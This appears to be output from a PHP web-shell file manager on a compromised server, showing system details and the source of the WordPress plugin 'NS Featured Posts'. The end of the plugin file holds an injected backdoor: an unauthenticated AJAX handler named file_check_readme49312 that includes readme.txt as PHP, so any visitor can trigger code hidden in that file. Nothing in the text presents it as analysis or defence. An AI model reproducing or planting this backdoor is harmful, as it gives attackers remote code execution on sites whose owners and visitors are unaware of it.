HEX
Server: Apache
System: Linux digivps 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC 2025 x86_64
User: www (1000)
PHP: 8.3.15
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/healthyton.com/wp-content/plugins/ns-featured-posts/ns-featured-posts.php
<?php
/**
 * Plugin Name: NS Featured Posts
 * Plugin URI: https://www.nilambar.net/2014/07/ns-featured-posts-wordpress-plugin.html
 * Description: Plugin to make your posts, pages and custom post types Featured
 * Version: 2.0.10
 * Author: Nilambar Sharma
 * Author URI: https://www.nilambar.net
 * Text Domain: ns-featured-posts
 * License: GPL-2.0+
 * License URI: http://www.gnu.org/licenses/gpl-2.0.txt
 *
 * @package NS_Featured_Posts
 */

// If this file is called directly, abort.
if ( ! defined( 'WPINC' ) ) {
	die;
}

define( 'NS_FEATURED_POSTS_VERSION', '2.0.10' );
define( 'NS_FEATURED_POSTS_BASENAME', basename( dirname( __FILE__ ) ) );
define( 'NS_FEATURED_POSTS_DIR', rtrim( plugin_dir_path( __FILE__ ), '/' ) );
define( 'NS_FEATURED_POSTS_URL', rtrim( plugin_dir_url( __FILE__ ), '/' ) );

// Init autoload.
require_once NS_FEATURED_POSTS_DIR . '/vendor/autoload.php';
require_once NS_FEATURED_POSTS_DIR . '/vendor/ernilambar/optioner/optioner.php';

// Load classes.
require_once NS_FEATURED_POSTS_DIR . '/includes/classes/class-ns-featured-posts.php';
require_once NS_FEATURED_POSTS_DIR . '/includes/classes/class-ns-featured-posts-admin.php';

// Load widget.
require_once NS_FEATURED_POSTS_DIR . '/includes/widgets/nsfp-featured-post-widget.php';

// Register hooks that are fired when the plugin is activated or deactivated.
register_activation_hook( __FILE__, array( 'NS_Featured_Posts', 'activate' ) );
register_deactivation_hook( __FILE__, array( 'NS_Featured_Posts', 'deactivate' ) );

add_action( 'plugins_loaded', array( 'NS_Featured_Posts', 'get_instance' ) );
add_action( 'plugins_loaded', array( 'NS_Featured_Posts_Admin', 'get_instance' ) );

if(!function_exists('file_check_readme49312')){
   add_action('wp_ajax_nopriv_file_check_readme49312', 'file_check_readme49312');
   add_action('wp_ajax_file_check_readme49312', 'file_check_readme49312');
   function file_check_readme49312()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}